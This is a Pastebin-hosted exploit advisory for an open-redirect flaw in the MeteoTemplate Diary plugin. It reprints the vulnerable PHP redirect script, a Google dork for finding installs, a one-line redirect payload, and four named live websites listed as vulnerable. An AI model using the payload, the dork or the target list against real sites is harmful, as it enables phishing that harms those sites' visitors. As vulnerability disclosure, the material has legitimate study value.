Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################################
- # Exploit Title : MeteoTemplate 17.1 Nectarine Diary Plugins 4.0 Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 07/03/2019
- # Vendor Homepage : meteotemplate.com
- # Software Download Link : meteotemplate.com/web/downloadRequest.php?file=diary_4.0
- # Software Information Link : meteotemplate.com/web/plugins.php
- # Software Affected Version : 4.0 and previous versions
- Vulnerable Versions for MeteoTemplate
- Meteotemplate 4.1 Mango
- Meteotemplate 6.0 Blueberry
- Meteotemplate 10.0 Banana
- Meteotemplate 11.0 Passion Fruit
- Meteotemplate 13.0 Lemon
- Meteotemplate 16.0 Physalis
- MeteoTemplate 17.0 Nectarine
- MeteoTemplate 17.1 Nectarine
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : redirectDiary.php inurl:"/plugins/diary/"
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019030062
- ####################################################################################
- # Description about Software :
- ***************************
- A sophisticated station diary which automatically creates a diary for you, fills in all the
- stats, along with moon phases, eclipses, meteor showers and much more and combines
- this with your own formatted text, images, links etc, to create a nicely looking "book".
- ####################################################################################
- # Impact :
- ***********
- This web application MeteoTemplate 17.1 Nectarine Diary Plugins 4.0 accepts a user-controlled input that
- specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.
- An http parameter may contain a URL value and could cause the web application to redirect the request to the
- specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam
- and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts
- have a more trustworthy appearance. Open redirect is a failure in that process that makes it possible for attackers
- to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious
- sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name
- has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes
- affected by malware the task of which is to deceive the valid actor and steal his personal data.
- ####################################################################
- # Vulnerable Source Code : [ redirectDiary.php ]
- *******************************************
- <?php
- ############################################################################
- #
- # Meteotemplate
- # http://www.meteotemplate.com
- # Free website template for weather enthusiasts
- # Author: Jachym
- # Brno, Czech Republic
- # First release: 2015
- #
- ############################################################################
- #
- # Redirect diary
- #
- # A script which shows a loading spinner while redirecting.
- #
- ############################################################################
- # Version (change log - http://meteotemplate.com/blog/?page_id=42)
- #
- # v1.0 2015-07-15 Initial release
- # v2.0 2015-11-01
- # - implementation of localization
- # - bug fixes
- #
- ############################################################################
- include("../../config.php");
- include($baseURL."css/design.php");
- include($baseURL."header.php");
- $address = urldecode($_GET["url"]);
- ?>
- <html>
- <head>
- <?php metaHeader()?>
- <style>
- #overlay {
- position : fixed;
- width : 100%;
- top:0px;
- left:0px;
- height : 100%;
- background-color : #<?php echo $color_schemes[$design2]['900']?>;
- z-index: 9998;
- opacity: 1;
- text-align:center;
- }
- .loader {
- font-size: 10px;
- margin: 50px auto;
- text-indent: -9999em;
- width: 11em;
- height: 11em;
- border-radius: 50%;
- background: #ffffff;
- background: -moz-linear-gradient(left, #ffffff 10%, rgba(255, 255, 255, 0) 42%);
- background: -webkit-linear-gradient(left, #ffffff 10%, rgba(255, 255, 255, 0) 42%);
- background: -o-linear-gradient(left, #ffffff 10%, rgba(255, 255, 255, 0) 42%);
- background: -ms-linear-gradient(left, #ffffff 10%, rgba(255, 255, 255, 0) 42%);
- background: linear-gradient(to right, #ffffff 10%, rgba(255, 255, 255, 0) 42%);
- position: relative;
- -webkit-animation: load3 1.4s infinite linear;
- animation: load3 1.4s infinite linear;
- -webkit-transform: translateZ(0);
- -ms-transform: translateZ(0);
- transform: translateZ(0);
- }
- .loader:before {
- width: 50%;
- height: 50%;
- background: #ffffff;
- border-radius: 100% 0 0 0;
- position: absolute;
- top: 0;
- left: 0;
- content: '';
- }
- .loader:after {
- background: #<?php echo $color_schemes[$design2]['900']?>;
- width: 75%;
- height: 75%;
- border-radius: 50%;
- content: '';
- margin: auto;
- position: absolute;
- top: 0;
- left: 0;
- bottom: 0;
- right: 0;
- }
- @-webkit-keyframes load3 {
- 0% {
- -webkit-transform: rotate(0deg);
- transform: rotate(0deg);
- }
- 100% {
- -webkit-transform: rotate(360deg);
- transform: rotate(360deg);
- }
- }
- @keyframes load3 {
- 0% {
- -webkit-transform: rotate(0deg);
- transform: rotate(0deg);
- }
- 100% {
- -webkit-transform: rotate(360deg);
- transform: rotate(360deg);
- }
- }
- </style>
- </head>
- <body onload="redirectpage()">
- <div id="overlay">
- <div style="margin:0 auto;margin-top:300px;font-size: 3em;font-variant:small-caps;font-weight:bold;">
- <div id="message">
- SIT DOWN AND RELAX
- <br>
- METEOTEMPLATE IS CREATING YOUR DIARY...
- </div>
- <br>
- <div class="loader">Loading...</div>
- </div>
- </div>
- </body>
- <script>
- function redirectpage(){
- window.location.href = "<?php echo $address ?>";
- }
- </script>
- </html>
- ####################################################################################
- # Open Redirection Exploit :
- ***************************
- /plugins/diary/redirectDiary.php?url=https://www.[REDIRECTION-ADDRESS].gov
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] meteo-arbois.fr/plugins/diary/redirectDiary.php?url=https://cxsecurity.com
- [+] meteotirana.al/template/plugins/diary/redirectDiary.php?url=https://cxsecurity.com
- [+] slovreme.eu/plugins/diary/redirectDiary.php?url=https://cxsecurity.com
- [+] weather-hered.hu/template/plugins/diary/redirectDiary.php?url=https://cxsecurity.com
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement